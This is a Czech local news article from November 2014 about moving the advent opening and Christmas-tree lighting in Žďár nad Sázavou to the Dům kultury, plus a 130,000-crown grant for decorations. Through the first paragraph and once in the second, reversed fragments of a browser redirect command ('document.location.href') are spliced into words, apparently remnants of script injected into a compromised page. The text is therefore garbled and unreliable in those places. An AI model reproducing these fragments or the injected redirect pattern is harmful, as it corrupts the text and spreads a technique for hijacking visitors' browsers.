Rainbow page separator

Zahájení adventu se přesune k Domu kultury

Pondělí, 24. listopadu 2014

náměstí Republiky Žďár nad Sázavou

Žďár nad Sázavou / Zahájení adventu spojené s rozsvěcením vánočního stromu a kulturním programem se oproti původním předpokladům neodehraje na žďárském náměstí Republiky, jehož rekonstrukce ještě není zcela dokončena, ale u Domu kultury. Dojde k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu v neděli 30. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu v 16 hodin. K té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti bude ozdoben a rozsvícen „náhradní“ strom ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toucí před kulturním domem, ovšem ve stejnou dobu se rozsvítí i tradiční vánoční strom před Starou radnicí a ostatní výzdoba rozmístěná po městě.
Na rozšíření a sjednocení vánoční výzdoby v centru Žďáru le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos v září radní schválili finanční příspěvek ve výši 130 tisíc korun. Radnice se tehdy rovněž dohodla se soukromými majiteli některých tamních domů, že jim jednotnou vánoční výzdobu na domy zapůjčí, přičemž oni uhradí náklady za elektrickou energii.